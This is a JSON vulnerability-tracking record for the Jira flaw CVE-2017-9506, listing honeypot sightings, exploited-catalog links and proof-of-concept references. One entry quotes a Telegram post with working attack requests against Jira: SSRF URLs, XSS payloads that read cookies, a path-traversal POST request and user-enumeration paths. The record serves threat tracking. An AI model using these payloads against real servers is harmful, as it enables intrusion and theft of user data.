{"vulnerability": "cve-2017-9506", "sightings": [{"uuid": "a1019163-7af4-4796-a976-506c41c80f93", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-9506", "type": "seen", "source": "https://gist.github.com/marcostolosa/bf0f4a6ea030bc83c2d8dde8df077407", "content": "", "creation_timestamp": "2025-04-13T12:04:46.000000Z"}, {"uuid": "1681a268-dd67-4720-b2c7-d58817b38d6d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-9506", "type": "published-proof-of-concept", "source": "https://t.me/lostsec/164", "content": "# Unauthenticated Jira CVEs\n1. CVE-2017-9506 (SSRF)\nhttps:///plugins/servlet/oauth/users/icon-uri?consumerUri=\n2. CVE-2018-20824 (XSS)\nhttps:///plugins/servlet/Wallboard/?dashboardId=10000&amp;dashboardId=10000&amp;cyclePeriod=alert(document.domain)\n3. CVE-2019-8451 (SSRF)\nhttps:///plugins/servlet/gadgets/makeRequest?url=https://:1337@example.com\n4. CVE-2019-8449 (User Information Disclosure)\nhttps:///rest/api/latest/groupuserpicker?query=1&amp;maxResults=50000&amp;showAvatar=true\n5. CVE-2019-8442 (Sensitive Information Disclosure)\nhttps:///s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml\n6. CVE-2019-3403 (User Enumeration)\nhttps:///rest/api/2/user/picker?query=\n7. CVE-2020-14181 (User Enumeration)\nhttps:///secure/ViewUserHover.jspa?username=\n8. CVE-2020-14178 (Project Key Enumeration)\nhttps:///browse.\n9. CVE-2020-14179 (Information Disclosure)\nhttps:///secure/QueryComponent!Default.jspa\n10. CVE-2019-11581 (Template Injection)\n/secure/ContactAdministrators!default.jspa\n\n* Try the SSTI Payloads\n11.   CVE-2019-3396 (Path Traversal)\nPOST /rest/tinymce/1/macro/preview HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en-US,en;q=0.5 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\nReferer: {{Hostname}}\nContent-Length: 168\nConnection: close\n\n{\"contentId\":\"786457\",\"macro\":{\"name\":\"widget\",\"body\":\"\",\"params\":{\"url\":\"https://www.viddler.com/v/23464dc5\",\"width\":\"1000\",\"height\":\"1000\",\"_template\":\"../web.xml\"}}}\n\n*Try above request with the Jira target\n12.   CVE-2019-3402 (XSS)\nhttps:///secure/ConfigurePortalPages!default.jspa?view=search&amp;searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&amp;Search=Search\n/secure/ConfigurePortalPages!default.jspa?view=popular\n/secure/ManageFilters.jspa?filterView=search&amp;Search=Search&amp;filterView=search&amp;sortColumn=favcount&amp;sortAscending=false\n/secure/ContactAdministrators!default.jspa\n/servicedesk/customer/user/login\n/issues/?jql=\n/plugins/servlet/oauth/users/icon-uri?consumerUri=http://google.com\n/rest/api/latest/groupuserpicker?query=1&amp;maxResults=50000&amp;showAvatar=true\n/plugins/servlet/gadgets/makeRequest?url=https://victomhost:1337@example.com\n/plugins/servlet/Wallboard/?dashboardId=10000&amp;dashboardId=10000&amp;cyclePeriod=alert(document.domain)\n/secure/QueryComponent!Default.jspa\n/secure/ViewUserHover.jspa\n/ViewUserHover.jspa?username=Admin\n/rest/api/2/dashboard?maxResults=100\n/pages/%3CIFRAME%20SRC%3D%22javascript%3Aalert(\u2018XSS\u2019)%22%3E.vm\n/rest/api/2/user/picker?query=admin\n/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml\n/rest/api/2/user/picker?query=admin\n/s/\n/plugins/servlet/oauth/users/icon-uri?consumerUri=https://www.google.nl\n/secure/ConfigurePortalPages!default.jspa?view=search&amp;searchOwnerUserName=x2rnu%3Cscript%3Ealert(1)%3C%2fscript%3Et1nmk&amp;Search=Search\nConfigurePortalPages.jspa\n/plugins/servlet/Wallboard/?dashboardId=10100&amp;dashboardId=10101&amp;cyclePeriod=(function(){alert(document.cookie);return%2030000;})()&amp;transitionFx=none&amp;random=true\nREPORTS:- \nhttps://hackerone.com/reports/713900\nhttps://hackerone.com/reports/1103582\nhttps://hackerone.com/reports/380354\nhttps://hackerone.com/reports/197726\nhttps://hackerone.com/reports/632808", "creation_timestamp": "2024-03-18T07:23:33.000000Z"}, {"uuid": "f434baa8-c209-4826-8a9c-bd053f21bc83", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-9506", "type": "published-proof-of-concept", "source": "https://t.me/thebugbountyhunter/1435", "content": "CVE-2017-9506 Jira-Scan https://github.com/random-robbie/Jira-Scan", "creation_timestamp": "2018-04-30T16:18:43.000000Z"}, {"uuid": "916d02a8-9806-404e-942b-6774a1490754", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-9506", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-05-07)", "content": "", "creation_timestamp": "2026-05-07T00:00:00.000000Z"}, {"uuid": "990dbd1d-21a9-4bcc-97ca-8095cf032e67", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-9506", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-05-11)", "content": "", "creation_timestamp": "2026-05-11T00:00:00.000000Z"}, {"uuid": "786a67bc-0947-4529-a90b-6fe40573eabd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-9506", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-05-20)", "content": "", "creation_timestamp": "2026-05-20T00:00:00.000000Z"}, {"uuid": "e9e603b4-b72d-4605-b1bf-49fa113c63a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-9506", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-05-23)", "content": "", "creation_timestamp": "2026-05-23T00:00:00.000000Z"}, {"uuid": "f40efe2a-5566-4ab0-89c9-9d2cd21a89df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-9506", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-05-25)", "content": "", "creation_timestamp": "2026-05-25T00:00:00.000000Z"}, {"uuid": "bc341f81-31f2-4264-82d1-a9ddfb7edad9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-9506", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-05-29)", "content": "", "creation_timestamp": "2026-05-29T00:00:00.000000Z"}, {"uuid": "5973f02b-11fc-41ab-9345-2da5433ed10c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-9506", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-06-06)", "content": "", "creation_timestamp": "2026-06-06T00:00:00.000000Z"}, {"uuid": "637cb714-d397-4c3e-ab63-024911229787", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-9506", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-06-07)", "content": "", "creation_timestamp": "2026-06-07T00:00:00.000000Z"}, {"uuid": "c8882852-c2c0-4f0d-b5c6-7ddf677a5032", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-9506", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-06-22)", "content": "", "creation_timestamp": "2026-06-22T00:00:00.000000Z"}, {"uuid": "3322d606-4c38-4ecb-bec9-5c82343eb98f", "vulnerability_lookup_origin": "caeb2787-0d58-4236-9039-7c86c3e566f3", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-9506", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/77712a7c-d7b9-4027-ac60-d07395675efe", "content": "", "creation_timestamp": "2026-06-23T14:06:23.081977Z"}, {"uuid": "fdf5585c-3eb1-4e68-9ea9-fd129cc813d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-9506", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-06-28)", "content": "", "creation_timestamp": "2026-06-29T10:00:07.027747Z"}, {"uuid": "d5444f28-a623-4ecb-8a82-242da8480b3a", "vulnerability_lookup_origin": "c8fb6bf1-f81f-4cb8-95b1-eadbb3b54ee8", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2017-9506", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/464b7f3d-0c16-4412-a9aa-0c295911257b", "content": "", "creation_timestamp": "2026-06-30T09:23:57.176039Z"}, {"uuid": "46dd42d9-2de2-4840-b60d-a50a6ea3a85e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-9506", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-07-01)", "content": "", "creation_timestamp": "2026-07-02T10:00:10.627438Z"}, {"uuid": "bc4686a7-d937-42c6-8c9a-0fef975dfd47", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-9506", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-07-05)", "content": "", "creation_timestamp": "2026-07-06T10:00:05.430055Z"}, {"uuid": "e0cb3cbd-87e3-4d5e-91d0-79822c7563a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-9506", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-07-06)", "content": "", "creation_timestamp": "2026-07-07T10:00:09.228943Z"}, {"uuid": "70fc7bd0-85f5-493f-92d8-87c44eadec2a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-9506", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-07-07)", "content": "", "creation_timestamp": "2026-07-08T10:00:15.865584Z"}]}